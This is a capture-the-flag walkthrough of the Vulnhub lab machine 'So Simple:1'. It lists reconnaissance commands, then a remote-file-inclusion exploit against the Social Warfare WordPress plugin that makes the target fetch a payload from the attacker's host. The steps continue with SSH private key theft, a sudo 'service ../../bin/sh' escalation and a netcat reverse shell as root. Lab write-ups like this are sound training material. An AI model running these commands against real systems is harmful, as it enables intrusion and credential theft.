So Simple:1 - Walkthrough [Vulnhub]
Here's my solution for So Simple:1.
The machine can be downloaded from here.
Nmap
Scanning for all TCP ports.
nmap -sC -sV -p- 192.168.1.104
nmap -sC -sV -p- 192.168.1.104
data:image/s3,"s3://crabby-images/8a0ee/8a0eef172ad957b411203d489470c89957252cc1" alt=""
Directory Scan
Browsing the web, and checking the source did not reveal any hint.
data:image/s3,"s3://crabby-images/efc16/efc164445e1f512f87d37aea5ac0b09a66fa9e18" alt=""
data:image/s3,"s3://crabby-images/da6e0/da6e0ee42a44d84807fb6868cdb7781e16b3fe6e" alt=""
Using dirb to scan for directories.
dirb http://192.168.1.104
data:image/s3,"s3://crabby-images/47de9/47de933dd9e5b75c1bc4b6bc84a343cf38b0b4b5" alt=""
We get a /wordpress directory.
data:image/s3,"s3://crabby-images/f85d0/f85d034dbb817a9dbb9c0de66a5b77443bb49848" alt=""
Using wpscan to enumerate all plugins.
wpscan --url http://192.168.1.104/wordpress -e ap
data:image/s3,"s3://crabby-images/53fa3/53fa3bae589bd5dac8b4a68d8ae21187c4b20b9c" alt=""
We find an exploit for the plugin- social warfare, lets get this 46794.py
data:image/s3,"s3://crabby-images/45357/45357b76931248eba17142d704285c081e373732" alt=""
To run the exploit, we create a file named as- exploit.txt, which contains the payload, and we host it on local machine.
data:image/s3,"s3://crabby-images/ee81d/ee81deed0d8373db384e226de6fb15a3cdb3cd67" alt=""
We run the exploit.
python 46794.py -t http://192.168.1.104/wordpress/ --payload-uri=http://192.168.1.108:8080/exploit.txt
data:image/s3,"s3://crabby-images/497ac/497ac95f831f2fe14228760667f9a9ade7400aab" alt=""
data:image/s3,"s3://crabby-images/8deac/8deacc190cba6d6d634cb6ad47a50f256cdafee8" alt=""
By reading the contents, we find 2 users- max and steven.
Now lets change the payload in exploit.txt file, to get the private ssh key of the user- max.
data:image/s3,"s3://crabby-images/bab23/bab231f73d89356e0016d4478b11570ad3ac3198" alt=""
Again we run the exploit.
data:image/s3,"s3://crabby-images/a8af9/a8af929f3481e52a7b5b6df013496329dbd87c26" alt=""
We copy the ssh key to a file named as- key.
Getting Access
Before accessing, lets change the permission of ssh key file named as- key.
chmod 600 key
ssh -i key max@192.168.1.104
data:image/s3,"s3://crabby-images/c2bb3/c2bb3cc86f625aeec4a55a2bd0416d86cd5f55c1" alt=""
User Flag.
data:image/s3,"s3://crabby-images/ce03b/ce03bc6e46af1ab482ea4a458d94fb3613d093dc" alt=""
Privilege Escalation
From Max > Steven.
We see that we can execute service command as user- steven.sudo -u steven service ../../bin/sh
data:image/s3,"s3://crabby-images/023d1/023d1a03201c0395f3008787137047379a1cd3b8" alt=""
User2 Flag.
data:image/s3,"s3://crabby-images/df1a8/df1a82bf32f7cfecda9ab23d5f83b49561efcac6" alt=""
From Steven > Root
We see that we can run /opt/tools/server-health.sh file as user- root.
data:image/s3,"s3://crabby-images/fadbb/fadbb70c335eb9312db71d4051bce5f73ecfa57e" alt=""
Navigate to /opt directory, create a directory- tools, under this directory create a file and name it as server-health.sh.
We place the payload in server-health.sh file and give an execute permission to it.
data:image/s3,"s3://crabby-images/62236/6223641a5e0805b207276f9b139dae8c556e749d" alt=""
Lets run this file as user- root, and on the other hand we start the netcat listener.
data:image/s3,"s3://crabby-images/a7109/a7109f91e2e0359388d2a77423c583c02409a81e" alt=""
We have a reverse shell.
Root Flag.
Comments
Post a Comment